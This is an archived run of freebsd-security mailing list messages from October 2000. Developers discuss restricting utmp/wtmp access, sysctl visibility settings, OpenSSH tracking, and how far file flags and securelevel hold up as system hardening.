authorization changes to -STABLE, as they're part of a larger structural improvement slated for inclusion in 5.0-CURRENT. However, they probably can be usefully isolated and MFC'd if the feature is desirable. > Restricted who/w/last > *---------------------------------------------------* > > Restricted who/w/last gives limited access to utmp/wtmp entries. > Users can see only own login to system (no group like w_all,w_grp) , > but if user is added to group w_grp can see own and group login . > Group w_all is for trusted users that have full read access to utmp/wtmp . Unless you make who/w/last privileged in some way and restrict access to utmp/wtmp based on that privilege (setgid or the like), these will only be advisory protections. I.e., changes only to the binaries offers no real protection. Requiring privilege for access to utmp may break many things. That's not to say this can't be done, just that it's a bit more complicated than adding permission checks to the tools themselves. It might be interesting, at some point, to move to keeping utmp-like information in kernel and accessing it via a MIB, rather than using a file: processes would be allowed to change certain entries based on access to the pty in question, but existing privileged calls would be required to set login names, etc. Wtmp has to remain a file for the obvious reasons. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11:15:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 173F737B503 for ; Wed, 4 Oct 2000 11:15:09 -0700 (PDT) Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id 4A97419265; Wed, 4 Oct 2000 13:15:08 -0500 (CDT) Received: (from nectar@localhost) by hamlet.nectar.com (8.9.3/8.9.3) id NAA54455; Wed, 4 Oct 2000 13:15:08 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Wed, 4 Oct 2000 13:15:08 -0500 From: "Jacques A. Vidrine" To: Bill Fumerola Cc: freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001004131508.A54413@hamlet.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , Bill Fumerola , freebsd-security@freebsd.org References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com> <20001004140436.K38472@jade.chc-chimes.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004140436.K38472@jade.chc-chimes.com>; from billf@chimesnet.com on Wed, Oct 04, 2000 at 02:04:36PM -0400 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:04:36PM -0400, Bill Fumerola wrote: > also, see kern.ps_showallprocs. Nifty, I missed that one. We need a man page with this kind of stuff. -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11:27:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6E17237B66D for ; Wed, 4 Oct 2000 11:27:31 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id OAA08418; Wed, 4 Oct 2000 14:27:25 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 4 Oct 2000 14:27:25 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL In-Reply-To: <20001004084729.C25121@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Check permission to who/w/last (need sgid uwtmp group) and reboot your > system . newsyslog.conf must be updated for this remain in effect more than a month; after that, newsyslog will rotate the wtmp log and chmod it to be world readable: /var/log/wtmp 644 3 * @01T05 B Similarly, utmp will be chmod'd each boot as part of clean_var() in /etc/rc: /etc/rc: (cd /var/run && cp /dev/null utmp && chmod 644 utmp;) I haven't read the patches so can't comment on their correctness. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11:44:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 4F2E337B502 for ; Wed, 4 Oct 2000 11:44:32 -0700 (PDT) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id OAA18194 for ; Wed, 4 Oct 2000 14:44:27 -0400 (EDT) Date: Wed, 4 Oct 2000 14:44:27 -0400 (EDT) From: To: freebsd-security@freebsd.org Subject: OSSH and NetBSD's "OSSH" ? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Since were trying to keep in sync with OpenSSH as the goal, has anyone given thought if we will maintain compatability with NetBSD's "OpenSSH" replacement? I think their decision to do their own implementation is just daft. But I am curious as to how this will affect things. I am guessing we will just sync with OSSH and if NetBSD's version happens to be compat fine if not too bad so sad. This whole thing really annoys me. But I am curious about others thoughts. ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11:46:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from beta.root-servers.ch (beta.root-servers.ch [195.49.33.19]) by hub.freebsd.org (Postfix) with SMTP id 2BDEB37B502 for ; Wed, 4 Oct 2000 11:46:34 -0700 (PDT) Received: (qmail 18164 invoked from network); 4 Oct 2000 18:46:24 -0000 Received: from client75-185.hispeed.ch (HELO WORK) (62.2.75.185) by beta.root-servers.ch with SMTP; 4 Oct 2000 18:46:24 -0000 Date: Wed, 4 Oct 2000 20:49:42 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.46c) UNREG / CD5BF9353B3B7091 Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <12917380571.20001004204942@buz.ch> To: Dima Dorfman Cc: Kris Kennaway , Alfred Perlstein , Mike Silbersack , Subject: Re[2]: BSD chpass (fwd) In-reply-To: <20001004100859.33A4A1F0A@static.unixfreak.org> References: <20001004100859.33A4A1F0A@static.unixfreak.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Dima, Wednesday, October 04, 2000, 12:08:59 PM, you wrote: > of the script kid population). A really clever attacker would modify > your securelevel settings in rc.conf, reboot the machine making it > look like a panic or power surge What about setting schg for it as well? You'd just need to find a way to change it yourself (not sure about it, but it should be changeable in single user mode which is fortunately only controllable by the console). Best regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11:47:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 4DA9037B502 for ; Wed, 4 Oct 2000 11:47:18 -0700 (PDT) Received: (qmail 90058 invoked by uid 1000); 4 Oct 2000 18:48:27 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 18:48:27 -0000 Date: Wed, 4 Oct 2000 13:48:27 -0500 (CDT) From: Mike Silbersack To: Bill Fumerola Cc: "Jacques A. Vidrine" , cjclark@alum.mit.edu, freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL In-Reply-To: <20001004140436.K38472@jade.chc-chimes.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Bill Fumerola wrote: > also, see kern.ps_showallprocs. I sent a letter to bugtraq regarding > kern.ps_showallprocs, but evidently approving posts of exploits that > haven't been sent to the the vendor takes up too much time and approving > my post isn't a priority. > > -- > Bill Fumerola - Network Architect, BOFH / Chimes, Inc. > billf@chimesnet.com / billf@FreeBSD.org Just tell them that the info was leaked onto freebsd-security already, and is in the wild. That should get it through. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 11:48:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id C4DE837B66D for ; Wed, 4 Oct 2000 11:48:34 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id OAA08769; Wed, 4 Oct 2000 14:48:30 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 4 Oct 2000 14:48:29 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Robert Watson wrote: > /etc/rc: (cd /var/run && cp /dev/null utmp && chmod 644 > utmp;) It turns out their install script and rc patch modifications do this, although that isn't documented. However, they don't handle the newsyslog changes for wtmp, and their use of setgid displays a misunderstanding of how process credentials are managed in the kernel. This implementation worries me a bit, and I'm a little surprised they didn't post to freebsd-security requesting review before posting to bugtraq. All in all, I wouldn't recommend using these changes until they can be properly reviewed. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 12: 1:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id ACEDB37B502 for ; Wed, 4 Oct 2000 12:01:47 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (1178 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Wed, 4 Oct 2000 13:44:03 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Wed, 4 Oct 2000 13:43:59 -0500 (CDT) From: James Wyatt To: "Jacques A. Vidrine" Cc: Bill Fumerola , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL In-Reply-To: <20001004131508.A54413@hamlet.nectar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Jacques A. Vidrine wrote: > On Wed, Oct 04, 2000 at 02:04:36PM -0400, Bill Fumerola wrote: > > also, see kern.ps_showallprocs. > > Nifty, I missed that one. We need a man page with this kind of stuff. An annotated list with text *would* be nicer than groping through sysctl.h and friends, but I learned a lot by using "sysctl -a | more" and using "find" to dive into /usr/src/sys. I *love* fishing into new OSes internals and FreeBSD is a rich ocean, but some of would like a fish sandwich. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 12: 7:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id F209E37B66E for ; Wed, 4 Oct 2000 12:07:27 -0700 (PDT) Received: by puck.firepipe.net (Postfix, from userid 1000) id 3A9E4192C; Wed, 4 Oct 2000 14:07:48 -0500 (EST) Date: Wed, 4 Oct 2000 14:07:48 -0500 From: Will Andrews To: Trevor Johnson Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD History Message-ID: <20001004140748.N26605@puck.firepipe.net> Reply-To: Will Andrews References: <200010041509.e94F9Tx35480@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from trevor@jpj.net on Wed, Oct 04, 2000 at 11:32:23AM -0400 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:32:23AM -0400, Trevor Johnson wrote: > See /usr/share/doc/en_US.ISO_8859-1/books/handbook/history.html . && /usr/share/misc/bsd-family-tree -- Will Andrews - Physics Computer Network wench The Universal Answer to All Problems - "It has something to do with physics." -- Comic on door of Room 240, Physics Building, Purdue University To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 12:17: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ADE2637B502; Wed, 4 Oct 2000 12:17:01 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA76265; Wed, 4 Oct 2000 12:17:01 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 12:17:01 -0700 From: Kris Kennaway To: Garrett Wollman Cc: Kris Kennaway , Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) Message-ID: <20001004121701.C73561@freefall.freebsd.org> References: <20001004021948.A76230@freefall.freebsd.org> <20001004092758.335931F0A@static.unixfreak.org> <20001004023249.B76230@freefall.freebsd.org> <200010041447.KAA54350@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010041447.KAA54350@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Wed, Oct 04, 2000 at 10:47:15AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote: > < said: > > > I think you're right. Which is a good reason why your /usr/bin should > > be schg too ;-) > > Actually, sappnd on all the directories which might be in (or on the > way to) root's path would be enough. Except you can still just mount a doctored copy over the top of it :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 12:23:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rpi.edu (mail.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 49CA137B502 for ; Wed, 4 Oct 2000 12:23:41 -0700 (PDT) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail.rpi.edu (8.9.3/8.9.3) with ESMTP id PAA241704; Wed, 4 Oct 2000 15:23:39 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: References: Date: Wed, 4 Oct 2000 15:23:38 -0400 To: , freebsd-security@FreeBSD.ORG From: Garance A Drosihn Subject: Re: OSSH and NetBSD's "OSSH" ? Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 2:44 PM -0400 10/4/00, wrote: > Since were trying to keep in sync with OpenSSH as the goal, >has anyone given thought if we will maintain compatability with >NetBSD's "OpenSSH" replacement? > >I think their decision to do their own implementation is just daft. >But I am curious as to how this will affect things. I am guessing >we will just sync with OSSH and if NetBSD's version happens to be >compat fine if not too bad so sad. This whole thing really annoys >me. But I am curious about others thoughts. I don't follow NetBSD, so I don't know what their replacement is or why they did it. My gut reaction is that I'd rather see freebsd stick with openssh.com's implementation, just because that is what I'll be using on many other unix platforms here at RPI. If NetBSD has a different implementation, and if that includes some "neat feature" that we would like, I would still prefer to see us work on getting THAT FEATURE into openssh.com's implementation, if possible. I would hope that whatever they have, it should be already be "compatible" with both openssh and the original ssh implementations, except for new features that they have added. Since I have no idea what this openssh-replacement is, or what benefits it might offer, there isn't much more I can say about it. --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 12:35:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58D5237B502; Wed, 4 Oct 2000 12:35:23 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA82717; Wed, 4 Oct 2000 12:35:23 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Wed, 4 Oct 2000 12:35:23 -0700 From: Kris Kennaway To: scanner@jurai.net Cc: freebsd-security@freebsd.org Subject: Re: OSSH and NetBSD's "OSSH" ? Message-ID: <20001004123523.G73561@freefall.freebsd.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from scanner@jurai.net on Wed, Oct 04, 2000 at 02:44:27PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 02:44:27PM -0400, scanner@jurai.net wrote: > > Since were trying to keep in sync with OpenSSH as the goal, has anyone > given thought if we will maintain compatability with NetBSD's > "OpenSSH" replacement? > > I think their decision to do their own implementation is just daft. But I > am curious as to how this will affect things. I am guessing we will just > sync with OSSH and if NetBSD's version happens to be compat fine if not > too bad so sad. This whole thing really annoys me. But I am curious about > others thoughts. I didn't know they have decided to fork their own version - all I've seen in their cvs logs is integration of the openbsd version. At any rate, I will be continuing to track the openbsd version, and compatability is something which the open and netbsd guys will have to work out for themselves. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 15:46:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id BAD7F37B502 for ; Wed, 4 Oct 2000 15:46:09 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id RAA02750; Wed, 4 Oct 2000 17:46:07 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-110.max1.wa.cyberlynk.net(207.227.118.110) by peak.mountin.net via smap (V1.3) id sma002748; Wed Oct 4 17:45:41 2000 Message-Id: <4.3.2.20001004173510.00afd880@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Wed, 04 Oct 2000 17:39:42 -0500 To: Dima Dorfman From: "Jeffrey J. Mountin" Subject: Re: BSD chpass (fwd) Cc: security@FreeBSD.ORG In-Reply-To: <20001004100859.33A4A1F0A@static.unixfreak.org> References: <20001004023249.B76230@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:08 AM 10/4/00 -0700, Dima Dorfman wrote: >IMO, the bottom line is, schg can only prevent an attacker if they >don't have a good understanding of the system (which accounts for most >of the script kid population). A really clever attacker would modify >your securelevel settings in rc.conf, reboot the machine making it >look like a panic or power surge (if they know you exclusivly access >it remotly), fool around, then change it back. Tripwire on a r/o disk >would tell you about it, but you can't do that remotly unless you plan >on never touching any system binaries. Or am I missing something? And why wouldn't you protect /etc as well. Then one would rely on physical security to change the security settings. A real PITA for remote systems, but even that could be worked around with some care to allow changes (reboot still required) and protect the system. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 17: 4:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 0640637B503; Wed, 4 Oct 2000 17:04:40 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 1035B1F0A; Wed, 4 Oct 2000 17:04:34 -0700 (PDT) Subject: Re: Re[2]: BSD chpass (fwd) In-Reply-To: <12917380571.20001004204942@buz.ch> from Gabriel Ambuehl at "Oct 4, 2000 08:49:42 pm" To: Gabriel Ambuehl Date: Wed, 4 Oct 2000 17:04:34 -0700 (PDT) Cc: Dima Dorfman , Kris Kennaway , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001005000434.1035B1F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hello Dima, > > Wednesday, October 04, 2000, 12:08:59 PM, you wrote: > > of the script kid population). A really clever attacker would modify > > your securelevel settings in rc.conf, reboot the machine making it > > look like a panic or power surge > > What about setting schg for it as well? You'd just need to find a > way Then they'd go change /etc/rc. You could set most of your root filesystem, including /etc, schg, which may help, but then you'd be making your machine almost unmanagable without console access. For example, how would you fix this chpass bug if you couldn't access the console and had no way to lower the securelevel, even with a reboot? -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "If you understand everything, you must be misinformed." -- Japanese Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 17:14: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id B7E8F37B503; Wed, 4 Oct 2000 17:13:59 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 835C11F0A; Wed, 4 Oct 2000 17:13:59 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <20001004121701.C73561@freefall.freebsd.org> from Kris Kennaway at "Oct 4, 2000 12:17:01 pm" To: Kris Kennaway Date: Wed, 4 Oct 2000 17:13:59 -0700 (PDT) Cc: Garrett Wollman , Kris Kennaway , Dima Dorfman , Alfred Perlstein , Mike Silbersack , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001005001359.835C11F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 04, 2000 at 10:47:15AM -0400, Garrett Wollman wrote: > > < said: > > > > > I think you're right. Which is a good reason why your /usr/bin should > > > be schg too ;-) > > > > Actually, sappnd on all the directories which might be in (or on the > > way to) root's path would be enough. > > Except you can still just mount a doctored copy over the top of it > :-) Actually, now that I think about it, this can be detered to a certain point. If you're running with securelevel >= 2, you can't load KLDs, and you can't run newfs. What would you mount? A vn device? Nope, unless the KLD is already loaded. A floppy? If you have physical access, you have better alternatives. You'd probably have to unmount another live filesystem and mount it in that place. Depending on what it is, you may have to erase some files on it, which isn't something which would go unnoticed by the admin. Then you have MFS and md, but those may not be in the kernel (and again, no KLDs). Maybe NFS. What else? -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "Don't talk about yourself, it will be done when you leave." -- Wilson Mizner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 17:24:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id 89C8537B503 for ; Wed, 4 Oct 2000 17:24:10 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id 309DF1F0A; Wed, 4 Oct 2000 17:24:10 -0700 (PDT) Subject: Re: BSD chpass (fwd) In-Reply-To: <4.3.2.20001004173510.00afd880@207.227.119.2> from "Jeffrey J. Mountin" at "Oct 4, 2000 05:39:42 pm" To: "Jeffrey J. Mountin" Date: Wed, 4 Oct 2000 17:24:10 -0700 (PDT) Cc: Dima Dorfman , security@FreeBSD.ORG From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <20001005002410.309DF1F0A@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > At 03:08 AM 10/4/00 -0700, Dima Dorfman wrote: > > >IMO, the bottom line is, schg can only prevent an attacker if they > >don't have a good understanding of the system (which accounts for most > >of the script kid population). A really clever attacker would modify > >your securelevel settings in rc.conf, reboot the machine making it > >look like a panic or power surge (if they know you exclusivly access > >it remotly), fool around, then change it back. Tripwire on a r/o disk > >would tell you about it, but you can't do that remotly unless you plan > >on never touching any system binaries. Or am I missing something? > > And why wouldn't you protect /etc as well. Then one would rely on physical > security to change the security settings. A real PITA for remote systems, > but even that could be worked around with some care to allow changes > (reboot still required) and protect the system. You could, but your system would become almost unmanagable. Relying on going to single user mode to do basic maintenance (say you had fingerd on in inetd, but now you want to turn it off in light of the recent hole) isn't such a good idea. In my experience, if doing something is a big hassle, it generally doesn't get done. Say someone discovers a small local DoS in some serivce you're running. Assuming nobody untrusted has an account, a local DoS isn't such a big threat. Since you have to physically walk to the machine, boot it to single user mode (causing minor downtime), and change it, you'd probably decide to leave it alone. After a while it builds up, and your machine slowly deteriorates(sp?). And if you ever can't get to the machine and there's a serious remote hole, you're in trouble. Another good example of this are the recent threads about supporting older releases. Everybody agress it should be done, but nobody wants to do it. I'm pretty sure that if it was simply a matter of running `cvs commit` in two different branches (e.g. the same code would work in all branches) it wouldn't be such a big problem. Since they probably have to tweak the code to work on another branch, they don't do it. Regards -- Dima Dorfman Finger dima@unixfreak.org for my public PGP key. "A problem well stated is a problem half solved." -- Charles F. Kettering To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 4 17:45:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id B1D0637B502; Wed, 4 Oct 2000 17:45:10 -0700 (PDT) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.0/8.11.0) with ESMTP id e950hma68036; Thu, 5 Oct 2000 01:43:48 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.0) with ESMTP id e950h3n29195; Thu, 5 Oct 2000 01:43:03 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200010050043.e950h3n29195@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Kris Kennaway Cc: scanner@jurai.net, freebsd-security@FreeBSD.ORG, brian@Awfulhak.org Subject: Re: OSSH and NetBSD's "OSSH" ? In-Reply-To: Message from Kris Kennaway of "Wed, 04 Oct 2000 12:35:23 PDT." <20001004123523.G73561@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 05 Oct 2000 01:43:03 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Wed, Oct 04, 2000 at 02:44:27PM -0400, scanner@jurai.net wrote: > > > > Since were trying to keep in sync with OpenSSH as the goal, has anyone > > given thought if we will maintain compatability with NetBSD's > > "OpenSSH" replacement? > > > > I think their decision to do their own implementation is just daft. But I > > am curious as to how this will affect things. I am guessing we will just > > sync 